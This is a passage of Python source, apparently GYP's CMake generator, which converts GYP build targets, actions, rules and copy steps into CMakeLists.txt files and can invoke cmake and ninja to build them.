Compilable(filename): """Return true if the file is compilable (should be in OBJS).""" return any(filename.endswith(e) for e in COMPILABLE_EXTENSIONS) def Linkable(filename): """Return true if the file is linkable (should be on the link line).""" return filename.endswith('.o') def NormjoinPathForceCMakeSource(base_path, rel_path): """Resolves rel_path against base_path and returns the result. If rel_path is an absolute path it is returned unchanged. Otherwise it is resolved against base_path and normalized. If the result is a relative path, it is forced to be relative to the CMakeLists.txt. """ if os.path.isabs(rel_path): return rel_path if any([rel_path.startswith(var) for var in FULL_PATH_VARS]): return rel_path # TODO: do we need to check base_path for absolute variables as well? return os.path.join('${CMAKE_CURRENT_LIST_DIR}', os.path.normpath(os.path.join(base_path, rel_path))) def NormjoinPath(base_path, rel_path): """Resolves rel_path against base_path and returns the result. TODO: what is this really used for? If rel_path begins with '$' it is returned unchanged. Otherwise it is resolved against base_path if relative, then normalized. """ if rel_path.startswith('$') and not rel_path.startswith('${configuration}'): return rel_path return os.path.normpath(os.path.join(base_path, rel_path)) def CMakeStringEscape(a): """Escapes the string 'a' for use inside a CMake string. This means escaping '\' otherwise it may be seen as modifying the next character '"' otherwise it will end the string ';' otherwise the string becomes a list The following do not need to be escaped '#' when the lexer is in string state, this does not start a comment The following are yet unknown '$' generator variables (like ${obj}) must not be escaped, but text $ should be escaped what is wanted is to know which $ come from generator variables """ return a.replace('\\', '\\\\').replace(';', '\\;').replace('"', '\\"') def SetFileProperty(output, source_name, property_name, values, sep): """Given a set of source file, sets the given property on them.""" output.write('set_source_files_properties(') output.write(source_name) output.write(' PROPERTIES ') output.write(property_name) output.write(' "') for value in values: output.write(CMakeStringEscape(value)) output.write(sep) output.write('")\n') def SetFilesProperty(output, variable, property_name, values, sep): """Given a set of source files, sets the given property on them.""" output.write('set_source_files_properties(') WriteVariable(output, variable) output.write(' PROPERTIES ') output.write(property_name) output.write(' "') for value in values: output.write(CMakeStringEscape(value)) output.write(sep) output.write('")\n') def SetTargetProperty(output, target_name, property_name, values, sep=''): """Given a target, sets the given property.""" output.write('set_target_properties(') output.write(target_name) output.write(' PROPERTIES ') output.write(property_name) output.write(' "') for value in values: output.write(CMakeStringEscape(value)) output.write(sep) output.write('")\n') def SetVariable(output, variable_name, value): """Sets a CMake variable.""" output.write('set(') output.write(variable_name) output.write(' "') output.write(CMakeStringEscape(value)) output.write('")\n') def SetVariableList(output, variable_name, values): """Sets a CMake variable to a list.""" if not values: return SetVariable(output, variable_name, "") if len(values) == 1: return SetVariable(output, variable_name, values[0]) output.write('list(APPEND ') output.write(variable_name) output.write('\n "') output.write('"\n "'.join([CMakeStringEscape(value) for value in values])) output.write('")\n') def UnsetVariable(output, variable_name): """Unsets a CMake variable.""" output.write('unset(') output.write(variable_name) output.write(')\n') def WriteVariable(output, variable_name, prepend=None): if prepend: output.write(prepend) output.write('${') output.write(variable_name) output.write('}') class CMakeTargetType(object): def __init__(self, command, modifier, property_modifier): self.command = command self.modifier = modifier self.property_modifier = property_modifier cmake_target_type_from_gyp_target_type = { 'executable': CMakeTargetType('add_executable', None, 'RUNTIME'), 'static_library': CMakeTargetType('add_library', 'STATIC', 'ARCHIVE'), 'shared_library': CMakeTargetType('add_library', 'SHARED', 'LIBRARY'), 'loadable_module': CMakeTargetType('add_library', 'MODULE', 'LIBRARY'), 'none': CMakeTargetType('add_custom_target', 'SOURCES', None), } def StringToCMakeTargetName(a): """Converts the given string 'a' to a valid CMake target name. All invalid characters are replaced by '_'. Invalid for cmake: ' ', '/', '(', ')', '"' Invalid for make: ':' Invalid for unknown reasons but cause failures: '.' """ return a.translate(string.maketrans(' /():."', '_______')) def WriteActions(target_name, actions, extra_sources, extra_deps, path_to_gyp, output): """Write CMake for the 'actions' in the target. Args: target_name: the name of the CMake target being generated. actions: the Gyp 'actions' dict for this target. extra_sources: [(<cmake_src>, <src>)] to append with generated source files. extra_deps: [<cmake_taget>] to append with generated targets. path_to_gyp: relative path from CMakeLists.txt being generated to the Gyp file in which the target being generated is defined. """ for action in actions: action_name = StringToCMakeTargetName(action['action_name']) action_target_name = '%s__%s' % (target_name, action_name) inputs = action['inputs'] inputs_name = action_target_name + '__input' SetVariableList(output, inputs_name, [NormjoinPathForceCMakeSource(path_to_gyp, dep) for dep in inputs]) outputs = action['outputs'] cmake_outputs = [NormjoinPathForceCMakeSource(path_to_gyp, out) for out in outputs] outputs_name = action_target_name + '__output' SetVariableList(output, outputs_name, cmake_outputs) # Build up a list of outputs. # Collect the output dirs we'll need. dirs = set(dir for dir in (os.path.dirname(o) for o in outputs) if dir) if int(action.get('process_outputs_as_sources', False)): extra_sources.extend(zip(cmake_outputs, outputs)) # add_custom_command output.write('add_custom_command(OUTPUT ') WriteVariable(output, outputs_name) output.write('\n') if len(dirs) > 0: for directory in dirs: output.write(' COMMAND ${CMAKE_COMMAND} -E make_directory ') output.write(directory) output.write('\n') output.write(' COMMAND ') output.write(gyp.common.EncodePOSIXShellList(action['action'])) output.write('\n') output.write(' DEPENDS ') WriteVariable(output, inputs_name) output.write('\n') output.write(' WORKING_DIRECTORY ${CMAKE_CURRENT_LIST_DIR}/') output.write(path_to_gyp) output.write('\n') output.write(' COMMENT ') if 'message' in action: output.write(action['message']) else: output.write(action_target_name) output.write('\n') output.write(' VERBATIM\n') output.write(')\n') # add_custom_target output.write('add_custom_target(') output.write(action_target_name) output.write('\n DEPENDS ') WriteVariable(output, outputs_name) output.write('\n SOURCES ') WriteVariable(output, inputs_name) output.write('\n)\n') extra_deps.append(action_target_name) def NormjoinRulePathForceCMakeSource(base_path, rel_path, rule_source): if rel_path.startswith(("${RULE_INPUT_PATH}","${RULE_INPUT_DIRNAME}")): if any([rule_source.startswith(var) for var in FULL_PATH_VARS]): return rel_path return NormjoinPathForceCMakeSource(base_path, rel_path) def WriteRules(target_name, rules, extra_sources, extra_deps, path_to_gyp, output): """Write CMake for the 'rules' in the target. Args: target_name: the name of the CMake target being generated. actions: the Gyp 'actions' dict for this target. extra_sources: [(<cmake_src>, <src>)] to append with generated source files. extra_deps: [<cmake_taget>] to append with generated targets. path_to_gyp: relative path from CMakeLists.txt being generated to the Gyp file in which the target being generated is defined. """ for rule in rules: rule_name = StringToCMakeTargetName(target_name + '__' + rule['rule_name']) inputs = rule.get('inputs', []) inputs_name = rule_name + '__input' SetVariableList(output, inputs_name, [NormjoinPathForceCMakeSource(path_to_gyp, dep) for dep in inputs]) outputs = rule['outputs'] var_outputs = [] for count, rule_source in enumerate(rule.get('rule_sources', [])): action_name = rule_name + '_' + str(count) rule_source_dirname, rule_source_basename = os.path.split(rule_source) rule_source_root, rule_source_ext = os.path.splitext(rule_source_basename) SetVariable(output, 'RULE_INPUT_PATH', rule_source) SetVariable(output, 'RULE_INPUT_DIRNAME', rule_source_dirname) SetVariable(output, 'RULE_INPUT_NAME', rule_source_basename) SetVariable(output, 'RULE_INPUT_ROOT', rule_source_root) SetVariable(output, 'RULE_INPUT_EXT', rule_source_ext) # Build up a list of outputs. # Collect the output dirs we'll need. dirs = set(dir for dir in (os.path.dirname(o) for o in outputs) if dir) # Create variables for the output, as 'local' variable will be unset. these_outputs = [] for output_index, out in enumerate(outputs): output_name = action_name + '_' + str(output_index) SetVariable(output, output_name, NormjoinRulePathForceCMakeSource(path_to_gyp, out, rule_source)) if int(rule.get('process_outputs_as_sources', False)): extra_sources.append(('${' + output_name + '}', out)) these_outputs.append('${' + output_name + '}') var_outputs.append('${' + output_name + '}') # add_custom_command output.write('add_custom_command(OUTPUT\n') for out in these_outputs: output.write(' ') output.write(out) output.write('\n') for directory in dirs: output.write(' COMMAND ${CMAKE_COMMAND} -E make_directory ') output.write(directory) output.write('\n') output.write(' COMMAND ') output.write(gyp.common.EncodePOSIXShellList(rule['action'])) output.write('\n') output.write(' DEPENDS ') WriteVariable(output, inputs_name) output.write(' ') output.write(NormjoinPath(path_to_gyp, rule_source)) output.write('\n') # CMAKE_CURRENT_LIST_DIR is where the CMakeLists.txt lives. # The cwd is the current build directory. output.write(' WORKING_DIRECTORY ${CMAKE_CURRENT_LIST_DIR}/') output.write(path_to_gyp) output.write('\n') output.write(' COMMENT ') if 'message' in rule: output.write(rule['message']) else: output.write(action_name) output.write('\n') output.write(' VERBATIM\n') output.write(')\n') UnsetVariable(output, 'RULE_INPUT_PATH') UnsetVariable(output, 'RULE_INPUT_DIRNAME') UnsetVariable(output, 'RULE_INPUT_NAME') UnsetVariable(output, 'RULE_INPUT_ROOT') UnsetVariable(output, 'RULE_INPUT_EXT') # add_custom_target output.write('add_custom_target(') output.write(rule_name) output.write(' DEPENDS\n') for out in var_outputs: output.write(' ') output.write(out) output.write('\n') output.write('SOURCES ') WriteVariable(output, inputs_name) output.write('\n') for rule_source in rule.get('rule_sources', []): output.write(' ') output.write(NormjoinPath(path_to_gyp, rule_source)) output.write('\n') output.write(')\n') extra_deps.append(rule_name) def WriteCopies(target_name, copies, extra_deps, path_to_gyp, output): """Write CMake for the 'copies' in the target. Args: target_name: the name of the CMake target being generated. actions: the Gyp 'actions' dict for this target. extra_deps: [<cmake_taget>] to append with generated targets. path_to_gyp: relative path from CMakeLists.txt being generated to the Gyp file in which the target being generated is defined. """ copy_name = target_name + '__copies' # CMake gets upset with custom targets with OUTPUT which specify no output. have_copies = any(copy['files'] for copy in copies) if not have_copies: output.write('add_custom_target(') output.write(copy_name) output.write(')\n') extra_deps.append(copy_name) return class Copy(object): def __init__(self, ext, command): self.cmake_inputs = [] self.cmake_outputs = [] self.gyp_inputs = [] self.gyp_outputs = [] self.ext = ext self.inputs_name = None self.outputs_name = None self.command = command file_copy = Copy('', 'copy') dir_copy = Copy('_dirs', 'copy_directory') for copy in copies: files = copy['files'] destination = copy['destination'] for src in files: path = os.path.normpath(src) basename = os.path.split(path)[1] dst = os.path.join(destination, basename) copy = file_copy if os.path.basename(src) else dir_copy copy.cmake_inputs.append(NormjoinPathForceCMakeSource(path_to_gyp, src)) copy.cmake_outputs.append(NormjoinPathForceCMakeSource(path_to_gyp, dst)) copy.gyp_inputs.append(src) copy.gyp_outputs.append(dst) for copy in (file_copy, dir_copy): if copy.cmake_inputs: copy.inputs_name = copy_name + '__input' + copy.ext SetVariableList(output, copy.inputs_name, copy.cmake_inputs) copy.outputs_name = copy_name + '__output' + copy.ext SetVariableList(output, copy.outputs_name, copy.cmake_outputs) # add_custom_command output.write('add_custom_command(\n') output.write('OUTPUT') for copy in (file_copy, dir_copy): if copy.outputs_name: WriteVariable(output, copy.outputs_name, ' ') output.write('\n') for copy in (file_copy, dir_copy): for src, dst in zip(copy.gyp_inputs, copy.gyp_outputs): # 'cmake -E copy src dst' will create the 'dst' directory if needed. output.write('COMMAND ${CMAKE_COMMAND} -E %s ' % copy.command) output.write(src) output.write(' ') output.write(dst) output.write("\n") output.write('DEPENDS') for copy in (file_copy, dir_copy): if copy.inputs_name: WriteVariable(output, copy.inputs_name, ' ') output.write('\n') output.write('WORKING_DIRECTORY ${CMAKE_CURRENT_LIST_DIR}/') output.write(path_to_gyp) output.write('\n') output.write('COMMENT Copying for ') output.write(target_name) output.write('\n') output.write('VERBATIM\n') output.write(')\n') # add_custom_target output.write('add_custom_target(') output.write(copy_name) output.write('\n DEPENDS') for copy in (file_copy, dir_copy): if copy.outputs_name: WriteVariable(output, copy.outputs_name, ' ') output.write('\n SOURCES') if file_copy.inputs_name: WriteVariable(output, file_copy.inputs_name, ' ') output.write('\n)\n') extra_deps.append(copy_name) def CreateCMakeTargetBaseName(qualified_target): """This is the name we would like the target to have.""" _, gyp_target_name, gyp_target_toolset = ( gyp.common.ParseQualifiedTarget(qualified_target)) cmake_target_base_name = gyp_target_name if gyp_target_toolset and gyp_target_toolset != 'target': cmake_target_base_name += '_' + gyp_target_toolset return StringToCMakeTargetName(cmake_target_base_name) def CreateCMakeTargetFullName(qualified_target): """An unambiguous name for the target.""" gyp_file, gyp_target_name, gyp_target_toolset = ( gyp.common.ParseQualifiedTarget(qualified_target)) cmake_target_full_name = gyp_file + ':' + gyp_target_name if gyp_target_toolset and gyp_target_toolset != 'target': cmake_target_full_name += '_' + gyp_target_toolset return StringToCMakeTargetName(cmake_target_full_name) class CMakeNamer(object): """Converts Gyp target names into CMake target names. CMake requires that target names be globally unique. One way to ensure this is to fully qualify the names of the targets. Unfortunatly, this ends up with all targets looking like "chrome_chrome_gyp_chrome" instead of just "chrome". If this generator were only interested in building, it would be possible to fully qualify all target names, then create unqualified target names which depend on all qualified targets which should have had that name. This is more or less what the 'make' generator does with aliases. However, one goal of this generator is to create CMake files for use with IDEs, and fully qualified names are not as user friendly. Since target name collision is rare, we do the above only when required. Toolset variants are always qualified from the base, as this is required for building. However, it also makes sense for an IDE, as it is possible for defines to be different. """ def __init__(self, target_list): self.cmake_target_base_names_conficting = set() cmake_target_base_names_seen = set() for qualified_target in target_list: cmake_target_base_name = CreateCMakeTargetBaseName(qualified_target) if cmake_target_base_name not in cmake_target_base_names_seen: cmake_target_base_names_seen.add(cmake_target_base_name) else: self.cmake_target_base_names_conficting.add(cmake_target_base_name) def CreateCMakeTargetName(self, qualified_target): base_name = CreateCMakeTargetBaseName(qualified_target) if base_name in self.cmake_target_base_names_conficting: return CreateCMakeTargetFullName(qualified_target) return base_name def WriteTarget(namer, qualified_target, target_dicts, build_dir, config_to_use, options, generator_flags, all_qualified_targets, output): # The make generator does this always. # TODO: It would be nice to be able to tell CMake all dependencies. circular_libs = generator_flags.get('circular', True) if not generator_flags.get('standalone', False): output.write('\n#') output.write(qualified_target) output.write('\n') gyp_file, _, _ = gyp.common.ParseQualifiedTarget(qualified_target) rel_gyp_file = gyp.common.RelativePath(gyp_file, options.toplevel_dir) rel_gyp_dir = os.path.dirname(rel_gyp_file) # Relative path from build dir to top dir. build_to_top = gyp.common.InvertRelativePath(build_dir, options.toplevel_dir) # Relative path from build dir to gyp dir. build_to_gyp = os.path.join(build_to_top, rel_gyp_dir) path_from_cmakelists_to_gyp = build_to_gyp spec = target_dicts.get(qualified_target, {}) config = spec.get('configurations', {}).get(config_to_use, {}) target_name = spec.get('target_name', '<missing target name>') target_type = spec.get('type', '<missing target type>') target_toolset = spec.get('toolset') cmake_target_type = cmake_target_type_from_gyp_target_type.get(target_type) if cmake_target_type is None: print ('Target %s has unknown target type %s, skipping.' % ( target_name, target_type ) ) return SetVariable(output, 'TARGET', target_name) SetVariable(output, 'TOOLSET', target_toolset) cmake_target_name = namer.CreateCMakeTargetName(qualified_target) extra_sources = [] extra_deps = [] # Actions must come first, since they can generate more OBJs for use below. if 'actions' in spec: WriteActions(cmake_target_name, spec['actions'], extra_sources, extra_deps, path_from_cmakelists_to_gyp, output) # Rules must be early like actions. if 'rules' in spec: WriteRules(cmake_target_name, spec['rules'], extra_sources, extra_deps, path_from_cmakelists_to_gyp, output) # Copies if 'copies' in spec: WriteCopies(cmake_target_name, spec['copies'], extra_deps, path_from_cmakelists_to_gyp, output) # Target and sources srcs = spec.get('sources', []) # Gyp separates the sheep from the goats based on file extensions. # A full separation is done here because of flag handing (see below). s_sources = [] c_sources = [] cxx_sources = [] linkable_sources = [] other_sources = [] for src in srcs: _, ext = os.path.splitext(src) src_type = COMPILABLE_EXTENSIONS.get(ext, None) src_norm_path = NormjoinPath(path_from_cmakelists_to_gyp, src); if src_type == 's': s_sources.append(src_norm_path) elif src_type == 'cc': c_sources.append(src_norm_path) elif src_type == 'cxx': cxx_sources.append(src_norm_path) elif Linkable(ext): linkable_sources.append(src_norm_path) else: other_sources.append(src_norm_path) for extra_source in extra_sources: src, real_source = extra_source _, ext = os.path.splitext(real_source) src_type = COMPILABLE_EXTENSIONS.get(ext, None) if src_type == 's': s_sources.append(src) elif src_type == 'cc': c_sources.append(src) elif src_type == 'cxx': cxx_sources.append(src) elif Linkable(ext): linkable_sources.append(src) else: other_sources.append(src) s_sources_name = None if s_sources: s_sources_name = cmake_target_name + '__asm_srcs' SetVariableList(output, s_sources_name, s_sources) c_sources_name = None if c_sources: c_sources_name = cmake_target_name + '__c_srcs' SetVariableList(output, c_sources_name, c_sources) cxx_sources_name = None if cxx_sources: cxx_sources_name = cmake_target_name + '__cxx_srcs' SetVariableList(output, cxx_sources_name, cxx_sources) linkable_sources_name = None if linkable_sources: linkable_sources_name = cmake_target_name + '__linkable_srcs' SetVariableList(output, linkable_sources_name, linkable_sources) other_sources_name = None if other_sources: other_sources_name = cmake_target_name + '__other_srcs' SetVariableList(output, other_sources_name, other_sources) # CMake gets upset when executable targets provide no sources. # http://www.cmake.org/pipermail/cmake/2010-July/038461.html dummy_sources_name = None has_sources = (s_sources_name or c_sources_name or cxx_sources_name or linkable_sources_name or other_sources_name) if target_type == 'executable' and not has_sources: dummy_sources_name = cmake_target_name + '__dummy_srcs' SetVariable(output, dummy_sources_name, "${obj}.${TOOLSET}/${TARGET}/genc/dummy.c") output.write('if(NOT EXISTS "') WriteVariable(output, dummy_sources_name) output.write('")\n') output.write(' file(WRITE "') WriteVariable(output, dummy_sources_name) output.write('" "")\n') output.write("endif()\n") # CMake is opposed to setting linker directories and considers the practice # of setting linker directories dangerous. Instead, it favors the use of # find_library and passing absolute paths to target_link_libraries. # However, CMake does provide the command link_directories, which adds # link directories to targets defined after it is called. # As a result, link_directories must come before the target definition. # CMake unfortunately has no means of removing entries from LINK_DIRECTORIES. library_dirs = config.get('library_dirs') if library_dirs is not None: output.write('link_directories(') for library_dir in library_dirs: output.write(' ') output.write(NormjoinPath(path_from_cmakelists_to_gyp, library_dir)) output.write('\n') output.write(')\n') output.write(cmake_target_type.command) output.write('(') output.write(cmake_target_name) if cmake_target_type.modifier is not None: output.write(' ') output.write(cmake_target_type.modifier) if s_sources_name: WriteVariable(output, s_sources_name, ' ') if c_sources_name: WriteVariable(output, c_sources_name, ' ') if cxx_sources_name: WriteVariable(output, cxx_sources_name, ' ') if linkable_sources_name: WriteVariable(output, linkable_sources_name, ' ') if other_sources_name: WriteVariable(output, other_sources_name, ' ') if dummy_sources_name: WriteVariable(output, dummy_sources_name, ' ') output.write(')\n') # Let CMake know if the 'all' target should depend on this target. exclude_from_all = ('TRUE' if qualified_target not in all_qualified_targets else 'FALSE') SetTargetProperty(output, cmake_target_name, 'EXCLUDE_FROM_ALL', exclude_from_all) for extra_target_name in extra_deps: SetTargetProperty(output, extra_target_name, 'EXCLUDE_FROM_ALL', exclude_from_all) # Output name and location. if target_type != 'none': # Link as 'C' if there are no other files if not c_sources and not cxx_sources: SetTargetProperty(output, cmake_target_name, 'LINKER_LANGUAGE', ['C']) # Mark uncompiled sources as uncompiled. if other_sources_name: output.write('set_source_files_properties(') WriteVariable(output, other_sources_name, '') output.write(' PROPERTIES HEADER_FILE_ONLY "TRUE")\n') # Mark object sources as linkable. if linkable_sources_name: output.write('set_source_files_properties(') WriteVariable(output, other_sources_name, '') output.write(' PROPERTIES EXTERNAL_OBJECT "TRUE")\n') # Output directory target_output_directory = spec.get('product_dir') if target_output_directory is None: if target_type in ('executable', 'loadable_module'): target_output_directory = generator_default_variables['PRODUCT_DIR'] elif target_type == 'shared_library': target_output_directory = '${builddir}/lib.${TOOLSET}' elif spec.get('standalone_static_library', False): target_output_directory = generator_default_variables['PRODUCT_DIR'] else: base_path = gyp.common.RelativePath(os.path.dirname(gyp_file), options.toplevel_dir) target_output_directory = '${obj}.${TOOLSET}' target_output_directory = ( os.path.join(target_output_directory, base_path)) cmake_target_output_directory = NormjoinPathForceCMakeSource( path_from_cmakelists_to_gyp, target_output_directory) SetTargetProperty(output, cmake_target_name, cmake_target_type.property_modifier + '_OUTPUT_DIRECTORY', cmake_target_output_directory) # Output name default_product_prefix = '' default_product_name = target_name default_product_ext = '' if target_type == 'static_library': static_library_prefix = generator_default_variables['STATIC_LIB_PREFIX'] default_product_name = RemovePrefix(default_product_name, static_library_prefix) default_product_prefix = static_library_prefix default_product_ext = generator_default_variables['STATIC_LIB_SUFFIX'] elif target_type in ('loadable_module', 'shared_library'): shared_library_prefix = generator_default_variables['SHARED_LIB_PREFIX'] default_product_name = RemovePrefix(default_product_name, shared_library_prefix) default_product_prefix = shared_library_prefix default_product_ext = generator_default_variables['SHARED_LIB_SUFFIX'] elif target_type != 'executable': print ('ERROR: What output file should be generated?', 'type', target_type, 'target', target_name) product_prefix = spec.get('product_prefix', default_product_prefix) product_name = spec.get('product_name', default_product_name) product_ext = spec.get('product_extension') if product_ext: product_ext = '.' + product_ext else: product_ext = default_product_ext SetTargetProperty(output, cmake_target_name, 'PREFIX', product_prefix) SetTargetProperty(output, cmake_target_name, cmake_target_type.property_modifier + '_OUTPUT_NAME', product_name) SetTargetProperty(output, cmake_target_name, 'SUFFIX', product_ext) # Make the output of this target referenceable as a source. cmake_target_output_basename = product_prefix + product_name + product_ext cmake_target_output = os.path.join(cmake_target_output_directory, cmake_target_output_basename) SetFileProperty(output, cmake_target_output, 'GENERATED', ['TRUE'], '') # Includes includes = config.get('include_dirs') if includes: # This (target include directories) is what requires CMake 2.8.8 includes_name = cmake_target_name + '__include_dirs' SetVariableList(output, includes_name, [NormjoinPathForceCMakeSource(path_from_cmakelists_to_gyp, include) for include in includes]) output.write('set_property(TARGET ') output.write(cmake_target_name) output.write(' APPEND PROPERTY INCLUDE_DIRECTORIES ') WriteVariable(output, includes_name, '') output.write(')\n') # Defines defines = config.get('defines') if defines is not None: SetTargetProperty(output, cmake_target_name, 'COMPILE_DEFINITIONS', defines, ';') # Compile Flags - http://www.cmake.org/Bug/view.php?id=6493 # CMake currently does not have target C and CXX flags. # So, instead of doing... # cflags_c = config.get('cflags_c') # if cflags_c is not None: # SetTargetProperty(output, cmake_target_name, # 'C_COMPILE_FLAGS', cflags_c, ' ') # cflags_cc = config.get('cflags_cc') # if cflags_cc is not None: # SetTargetProperty(output, cmake_target_name, # 'CXX_COMPILE_FLAGS', cflags_cc, ' ') # Instead we must... cflags = config.get('cflags', []) cflags_c = config.get('cflags_c', []) cflags_cxx = config.get('cflags_cc', []) if (not cflags_c or not c_sources) and (not cflags_cxx or not cxx_sources): SetTargetProperty(output, cmake_target_name, 'COMPILE_FLAGS', cflags, ' ') elif c_sources and not (s_sources or cxx_sources): flags = [] flags.extend(cflags) flags.extend(cflags_c) SetTargetProperty(output, cmake_target_name, 'COMPILE_FLAGS', flags, ' ') elif cxx_sources and not (s_sources or c_sources): flags = [] flags.extend(cflags) flags.extend(cflags_cxx) SetTargetProperty(output, cmake_target_name, 'COMPILE_FLAGS', flags, ' ') else: # TODO: This is broken, one cannot generally set properties on files, # as other targets may require different properties on the same files. if s_sources and cflags: SetFilesProperty(output, s_sources_name, 'COMPILE_FLAGS', cflags, ' ') if c_sources and (cflags or cflags_c): flags = [] flags.extend(cflags) flags.extend(cflags_c) SetFilesProperty(output, c_sources_name, 'COMPILE_FLAGS', flags, ' ') if cxx_sources and (cflags or cflags_cxx): flags = [] flags.extend(cflags) flags.extend(cflags_cxx) SetFilesProperty(output, cxx_sources_name, 'COMPILE_FLAGS', flags, ' ') # Linker flags ldflags = config.get('ldflags') if ldflags is not None: SetTargetProperty(output, cmake_target_name, 'LINK_FLAGS', ldflags, ' ') # Note on Dependencies and Libraries: # CMake wants to handle link order, resolving the link line up front. # Gyp does not retain or enforce specifying enough information to do so. # So do as other gyp generators and use --start-group and --end-group. # Give CMake as little information as possible so that it doesn't mess it up. # Dependencies rawDeps = spec.get('dependencies', []) static_deps = [] shared_deps = [] other_deps = [] for rawDep in rawDeps: dep_cmake_name = namer.CreateCMakeTargetName(rawDep) dep_spec = target_dicts.get(rawDep, {}) dep_target_type = dep_spec.get('type', None) if dep_target_type == 'static_library': static_deps.append(dep_cmake_name) elif dep_target_type == 'shared_library': shared_deps.append(dep_cmake_name) else: other_deps.append(dep_cmake_name) # ensure all external dependencies are complete before internal dependencies # extra_deps currently only depend on their own deps, so otherwise run early if static_deps or shared_deps or other_deps: for extra_dep in extra_deps: output.write('add_dependencies(') output.write(extra_dep) output.write('\n') for deps in (static_deps, shared_deps, other_deps): for dep in gyp.common.uniquer(deps): output.write(' ') output.write(dep) output.write('\n') output.write(')\n') linkable = target_type in ('executable', 'loadable_module', 'shared_library') other_deps.extend(extra_deps) if other_deps or (not linkable and (static_deps or shared_deps)): output.write('add_dependencies(') output.write(cmake_target_name) output.write('\n') for dep in gyp.common.uniquer(other_deps): output.write(' ') output.write(dep) output.write('\n') if not linkable: for deps in (static_deps, shared_deps): for lib_dep in gyp.common.uniquer(deps): output.write(' ') output.write(lib_dep) output.write('\n') output.write(')\n') # Libraries if linkable: external_libs = [lib for lib in spec.get('libraries', []) if len(lib) > 0] if external_libs or static_deps or shared_deps: output.write('target_link_libraries(') output.write(cmake_target_name) output.write('\n') if static_deps: write_group = circular_libs and len(static_deps) > 1 if write_group: output.write('-Wl,--start-group\n') for dep in gyp.common.uniquer(static_deps): output.write(' ') output.write(dep) output.write('\n') if write_group: output.write('-Wl,--end-group\n') if shared_deps: for dep in gyp.common.uniquer(shared_deps): output.write(' ') output.write(dep) output.write('\n') if external_libs: for lib in gyp.common.uniquer(external_libs): output.write(' ') output.write(lib) output.write('\n') output.write(')\n') UnsetVariable(output, 'TOOLSET') UnsetVariable(output, 'TARGET') def GenerateOutputForConfig(target_list, target_dicts, data, params, config_to_use): options = params['options'] generator_flags = params['generator_flags'] # generator_dir: relative path from pwd to where make puts build files. # Makes migrating from make to cmake easier, cmake doesn't put anything here. # Each Gyp configuration creates a different CMakeLists.txt file # to avoid incompatibilities between Gyp and CMake configurations. generator_dir = os.path.relpath(options.generator_output or '.') # output_dir: relative path from generator_dir to the build directory. output_dir = generator_flags.get('output_dir', 'out') # build_dir: relative path from source root to our output files. # e.g. "out/Debug" build_dir = os.path.normpath(os.path.join(generator_dir, output_dir, config_to_use)) toplevel_build = os.path.join(options.toplevel_dir, build_dir) output_file = os.path.join(toplevel_build, 'CMakeLists.txt') gyp.common.EnsureDirExists(output_file) output = open(output_file, 'w') output.write('cmake_minimum_required(VERSION 2.8.8 FATAL_ERROR)\n') output.write('cmake_policy(VERSION 2.8.8)\n') gyp_file, project_target, _ = gyp.common.ParseQualifiedTarget(target_list[-1]) output.write('project(') output.write(project_target) output.write(')\n') SetVariable(output, 'configuration', config_to_use) ar = None cc = None cxx = None make_global_settings = data[gyp_file].get('make_global_settings', []) build_to_top = gyp.common.InvertRelativePath(build_dir, options.toplevel_dir) for key, value in make_global_settings: if key == 'AR': ar = os.path.join(build_to_top, value) if key == 'CC': cc = os.path.join(build_to_top, value) if key == 'CXX': cxx = os.path.join(build_to_top, value) ar = gyp.common.GetEnvironFallback(['AR_target', 'AR'], ar) cc = gyp.common.GetEnvironFallback(['CC_target', 'CC'], cc) cxx = gyp.common.GetEnvironFallback(['CXX_target', 'CXX'], cxx) if ar: SetVariable(output, 'CMAKE_AR', ar) if cc: SetVariable(output, 'CMAKE_C_COMPILER', cc) if cxx: SetVariable(output, 'CMAKE_CXX_COMPILER', cxx) # The following appears to be as-yet undocumented. # http://public.kitware.com/Bug/view.php?id=8392 output.write('enable_language(ASM)\n') # ASM-ATT does not support .S files. # output.write('enable_language(ASM-ATT)\n') if cc: SetVariable(output, 'CMAKE_ASM_COMPILER', cc) SetVariable(output, 'builddir', '${CMAKE_CURRENT_BINARY_DIR}') SetVariable(output, 'obj', '${builddir}/obj') output.write('\n') # TODO: Undocumented/unsupported (the CMake Java generator depends on it). # CMake by default names the object resulting from foo.c to be foo.c.o. # Gyp traditionally names the object resulting from foo.c foo.o. # This should be irrelevant, but some targets extract .o files from .a # and depend on the name of the extracted .o files. output.write('set(CMAKE_C_OUTPUT_EXTENSION_REPLACE 1)\n') output.write('set(CMAKE_CXX_OUTPUT_EXTENSION_REPLACE 1)\n') output.write('\n') # Force ninja to use rsp files. Otherwise link and ar lines can get too long, # resulting in 'Argument list too long' errors. output.write('set(CMAKE_NINJA_FORCE_RESPONSE_FILE 1)\n') output.write('\n') namer = CMakeNamer(target_list) # The list of targets upon which the 'all' target should depend. # CMake has it's own implicit 'all' target, one is not created explicitly. all_qualified_targets = set() for build_file in params['build_files']: for qualified_target in gyp.common.AllTargets(target_list, target_dicts, os.path.normpath(build_file)): all_qualified_targets.add(qualified_target) for qualified_target in target_list: WriteTarget(namer, qualified_target, target_dicts, build_dir, config_to_use, options, generator_flags, all_qualified_targets, output) output.close() def PerformBuild(data, configurations, params): options = params['options'] generator_flags = params['generator_flags'] # generator_dir: relative path from pwd to where make puts build files. # Makes migrating from make to cmake easier, cmake doesn't put anything here. generator_dir = os.path.relpath(options.generator_output or '.') # output_dir: relative path from generator_dir to the build directory. output_dir = generator_flags.get('output_dir', 'out') for config_name in configurations: # build_dir: relative path from source root to our output files. # e.g. "out/Debug" build_dir = os.path.normpath(os.path.join(generator_dir, output_dir, config_name)) arguments = ['cmake', '-G', 'Ninja'] print 'Generating [%s]: %s' % (config_name, arguments) subprocess.check_call(arguments, cwd=build_dir) arguments = ['ninja', '-C', build_dir] print 'Building [%s]: %s' % (config_name, arguments) subprocess.check_call(arguments) def CallGenerateOutputForConfig(arglist): # Ignore the interrupt signal so that the parent process catches it and # kills all multiprocessing children. signal.signal(signal.SIGINT, signal.SIG_IGN) target_list, target_dicts, data, params, config_name = arglist GenerateOutputForConfig(target_list, target_dicts, data, params, config_name) def GenerateOutput(target_list, target_dicts, data, params): user_config = params.get('generator_flags', {}).get('config', None) if user_config: GenerateOutputForConfig(target_list, target_dicts, data, params, user_config) else: config_names = target_dicts[target_list[0]]['configurations'].keys() if params['parallel']: try: pool = multiprocessing.Pool(len(config_names)) arglists = [] for config_name in config_names: arglists.append((target_list, target_dicts, data, params, config_name)) pool.map(CallGenerateOutputForConfig, arglists) except KeyboardInterrupt, e: pool.terminate() raise e else: for config_name in config_names: GenerateOutputForConfig(target_list, target_dicts, data, 